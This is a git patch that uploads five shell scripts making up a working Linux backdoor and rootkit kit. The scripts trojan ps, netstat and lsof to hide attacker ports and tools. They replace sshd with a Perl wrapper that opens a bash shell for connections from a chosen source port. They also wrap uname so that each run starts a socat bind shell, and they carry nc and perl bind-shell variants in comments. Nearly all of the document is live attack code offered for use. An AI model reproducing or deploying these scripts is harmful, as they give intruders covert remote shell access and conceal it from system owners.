From b8d0052ed5025cf9e6e4eb09b11d62ddff4d395c Mon Sep 17 00:00:00 2001
From: iamckn <kamauchrispus@gmail.com>
Date: Mon, 20 Nov 2017 21:04:16 +0300
Subject: [PATCH] Initial upload

---
 bd_hide.sh    | 34 ++++++++++++++++++++++++++++++++++
 bd_hide_c.sh  | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++
 bd_sshd.sh    | 18 ++++++++++++++++++
 bd_uname.sh   | 14 ++++++++++++++
 bd_uname_c.sh | 31 +++++++++++++++++++++++++++++++
 5 files changed, 148 insertions(+)
 create mode 100644 bd_hide.sh
 create mode 100644 bd_hide_c.sh
 create mode 100644 bd_sshd.sh
 create mode 100644 bd_uname.sh
 create mode 100644 bd_uname_c.sh

diff --git a/bd_hide.sh b/bd_hide.sh
new file mode 100644
index 0000000..1e4622b
--- /dev/null
+++ b/bd_hide.sh
@@ -0,0 +1,34 @@
+#!/bin/bash
+
+#ps
+#------------------------
+touch /usr/local/bin/ps
+
+cat <<EOF >> /usr/local/bin/ps	
+#!/bin/bash
+/bin/ps \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/ps
+
+#netstat
+#------------------------
+touch /usr/local/bin/netstat
+
+cat <<EOF >> /usr/local/bin/netstat
+#!/bin/bash
+/bin/netstat \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/netstat
+
+#lsof
+#------------------------
+touch /usr/local/bin/lsof
+
+cat <<EOF >> /usr/local/bin/lsof
+#!/bin/bash
+/usr/bin/lsof \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/lsof
\ No newline at end of file
diff --git a/bd_hide_c.sh b/bd_hide_c.sh
new file mode 100644
index 0000000..7f619df
--- /dev/null
+++ b/bd_hide_c.sh
@@ -0,0 +1,51 @@
+#!/bin/bash
+
+#netstat
+#------------------------
+touch /tmp/.netstat.c
+
+cat <<EOF >> /tmp/.netstat.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/bin/netstat \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.netstat.c -o /usr/local/bin/netstat
+
+rm /tmp/.netstat.c
+
+
+#ps
+#------------------------
+touch /tmp/.ps.c
+
+cat <<EOF >> /tmp/.ps.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/bin/ps \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.ps.c -o /usr/local/bin/ps
+
+rm /tmp/.ps.c
+
+
+#lsof
+#------------------------
+touch /tmp/.lsof.c
+
+cat <<EOF >> /tmp/.lsof.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/usr/bin/lsof \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.lsof.c -o /usr/local/bin/lsof
+
+rm /tmp/.lsof.c
\ No newline at end of file
diff --git a/bd_sshd.sh b/bd_sshd.sh
new file mode 100644
index 0000000..b11ce7d
--- /dev/null
+++ b/bd_sshd.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+
+#sshd
+#-------------------------
+mv /usr/sbin/sshd /usr/bin/
+touch /usr/sbin/sshd
+
+cat <<EOF >> /usr/sbin/sshd
+#!/usr/bin/perl
+exec"/bin/bash"if(getpeername(STDIN)=~/^..LF/);
+exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
+EOF
+
+chmod +x /usr/sbin/sshd
+service sshd restart
+
+#usage
+#socat STDIO TCP4:<target ip>:22,sourceport=19526
diff --git a/bd_uname.sh b/bd_uname.sh
new file mode 100644
index 0000000..451e978
--- /dev/null
+++ b/bd_uname.sh
@@ -0,0 +1,14 @@
+#uname
+#-------------------------
+touch /usr/local/bin/uname
+
+cat <<EOF >> /usr/local/bin/uname
+#!/bin/bash
+#nc.traditional -l -v -p 4444 -e /bin/bash 2>/dev/null &
+#socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &
+socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &
+#perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &
+/bin/uname \$@
+EOF
+
+chmod +x /usr/local/bin/uname
\ No newline at end of file
diff --git a/bd_uname_c.sh b/bd_uname_c.sh
new file mode 100644
index 0000000..2a7cfd5
--- /dev/null
+++ b/bd_uname_c.sh
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+#uname
+#------------------------
+touch /tmp/.uname.c
+
+cat <<EOF >> /tmp/.uname.c
+
+#include <sys/types.h>
+
+int main(int a,char**b){
+  pid_t child_pid = fork();
+  if(child_pid == 0) {
+    /* char*d[999999]={"sh","-c","nc.traditional -l -v -p 4444 -e /bin/bash 2>/dev/null &"}; */
+    /* char*d[999999]={"sh","-c","socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &"}; */
+    char*d[999999]={"sh","-c","socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &"};
+    /* char*d[999999]={"sh","-c","perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &"}; */
+    execv("/bin/sh",d);
+    exit(0);
+  }
+  else {
+    char*c[999999]={"sh","-c","/bin/uname \$*"};
+    memcpy(c+3,b,8*a);
+    execv("/bin/sh",c);
+  }
+}
+EOF
+
+gcc -xc /tmp/.uname.c -o /usr/local/bin/uname
+
+rm /tmp/.uname.c